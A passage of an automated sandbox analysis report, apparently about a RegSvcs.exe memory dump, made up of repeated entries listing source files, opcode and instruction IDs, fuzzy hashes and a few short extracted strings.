                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRcq
                                            • API String ID: 0-4134321033
                                            • Opcode ID: 7df2ee51dae92d4f0fbf6da8274890decea9ed1a0d70aac30e35e9ef40c49e8e
                                            • Instruction ID: c1aabbf057a5f1d8c5ec23fd7a30daa846a9b0ddfc3e030d09d3500aa408fcfe
                                            • Opcode Fuzzy Hash: 7df2ee51dae92d4f0fbf6da8274890decea9ed1a0d70aac30e35e9ef40c49e8e
                                            • Instruction Fuzzy Hash: E322B274A00219CFCB54EF65ED84A9DBBB2FF88301F1085A9D809AB355DB346E85CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRcq
                                            • API String ID: 0-4134321033
                                            • Opcode ID: f2a40ceefe8dde966f87756a7e082e16117d937f0224e698dfa9022c69b92dd1
                                            • Instruction ID: fa644f3cc21ca6982ebbbc070d06784903ccdfb95308201aaab874d10f2526e6
                                            • Opcode Fuzzy Hash: f2a40ceefe8dde966f87756a7e082e16117d937f0224e698dfa9022c69b92dd1
                                            • Instruction Fuzzy Hash: F422A274A00219CFCB54EF65ED84A9DBBB2FF88301F1085A9D809AB355DB346E85CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq
                                            • API String ID: 0-1855696158
                                            • Opcode ID: a15be2165f8b926936f0ccd3fb0f96429082ba329b76fd9e2069606ba80f8311
                                            • Instruction ID: 4f2611fdca2da330b9333143508d4f06e16cb9257a463bfff2a9e44e99d91f9d
                                            • Opcode Fuzzy Hash: a15be2165f8b926936f0ccd3fb0f96429082ba329b76fd9e2069606ba80f8311
                                            • Instruction Fuzzy Hash: 10410F357006489FCB08AB79D854AAEBBFABFCD221F1440A9D506D7395CE309C41CBA0
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f8efcba9f80ac1272136175d2ae9f502c36d9f3830fc35474ed8d3113618142
                                            • Instruction ID: 78ebabd6f17c0662ba108f65b4c6145e9450c295d4f4b65db67d842106614b17
                                            • Opcode Fuzzy Hash: 3f8efcba9f80ac1272136175d2ae9f502c36d9f3830fc35474ed8d3113618142
                                            • Instruction Fuzzy Hash: B1F12A75B116158FCB04CF6DC8849ADBBFAFF89310B1A8099E555AB362CB35EC81CB50
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 25de7ce9c60fcab81b346ef62ed85601111c1b4e5be78f94f8fa37345076f24e
                                            • Instruction ID: 335f15e1fb6286f9e0bfeea2e8b3a649b6dac07e41dad15c5dffe8da839a11f1
                                            • Opcode Fuzzy Hash: 25de7ce9c60fcab81b346ef62ed85601111c1b4e5be78f94f8fa37345076f24e
                                            • Instruction Fuzzy Hash: 28713D74741605CFDB59DF28C498AAD7BEDAF4AA01F1940A9E906CB3B1DB70DC41CBA0
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d34ad98a89b94766878b9cbfd029cb4e616e1cec968aadfd5d7bfe80acf5dd6
                                            • Instruction ID: 1a9619531a46086106109fec5653068cbd502f1d9d052c94a50802a176ba5c41
                                            • Opcode Fuzzy Hash: 9d34ad98a89b94766878b9cbfd029cb4e616e1cec968aadfd5d7bfe80acf5dd6
                                            • Instruction Fuzzy Hash: 1D5193B0025F469FC2283F20B1BC1AABBA5FF4F3277456D45E14E858299BB054D9CB21
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d2d850264833716917ffd11964bc4f185b2a2c133e8fc9accac1d86f2ed84f6b
                                            • Instruction ID: 34abc1d4e8b16f303d1285413befea10708595c50bc5e03c28f9fe2a4a246d01
                                            • Opcode Fuzzy Hash: d2d850264833716917ffd11964bc4f185b2a2c133e8fc9accac1d86f2ed84f6b
                                            • Instruction Fuzzy Hash: 94518FB0025F069F82283F30B1BC1AABBA5FF4F3277856D45E14E858299BB054D9CB21
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 117058b65550883494cdc2a7ca8dffa6cca99bbcfd967fda537efc2b6b2f58cc
                                            • Instruction ID: 4fe0514d3b35b9aaa18831c8885c7442b5db12dbff5610fb2d5d2df2d00910a9
                                            • Opcode Fuzzy Hash: 117058b65550883494cdc2a7ca8dffa6cca99bbcfd967fda537efc2b6b2f58cc
                                            • Instruction Fuzzy Hash: 53519574E01208DFDB54DFAAD58499DBBF2FF89310F248169E819AB364DB30A901CF50
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27ef6d361e20797faa13c37a25b62496ae059d4860b7c0ac77bd4bf00f150827
                                            • Instruction ID: 6ac2f1a59f512d78af1a28aa12bee0a3a4582a3e007296bf2038be6252eb3afb
                                            • Opcode Fuzzy Hash: 27ef6d361e20797faa13c37a25b62496ae059d4860b7c0ac77bd4bf00f150827
                                            • Instruction Fuzzy Hash: 29519778E01208CFCB48DFA9D99499DBBB6FF8D301B209469E405AB324DB359C45CF50
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5680b9eda4315f4172e67d05c5accec66795223d9665bdd6bab5c5e0b320f48d
                                            • Instruction ID: 425f8b34a8fc189a82c3e9efae3b606bbdd313bcd96c9a46e6e909b879886dd0
                                            • Opcode Fuzzy Hash: 5680b9eda4315f4172e67d05c5accec66795223d9665bdd6bab5c5e0b320f48d
                                            • Instruction Fuzzy Hash: A741AF31A05649DFCF15CFA8C844B9EBFFAEF4A310F048555E855AB291D3B4E950CBA0
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cf5fbadeadd3df349deb74b83ee322ee5aa1c452fc1b66fd83ae8170053b91c4
                                            • Instruction ID: e55c21028ba6ad775eb59f6c3471bcc1e2291ce0092f2b51368a4f5ff80e279b
                                            • Opcode Fuzzy Hash: cf5fbadeadd3df349deb74b83ee322ee5aa1c452fc1b66fd83ae8170053b91c4
                                            • Instruction Fuzzy Hash: BA41DF31A01248EFCB14CF64C884BABBBFAEB49310F08846AE4158B251D779DD85CBA1
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Strings
                                            • String ID: \;cq$\;cq$\;cq$\;cq
                                            • API String ID: 0-2961067002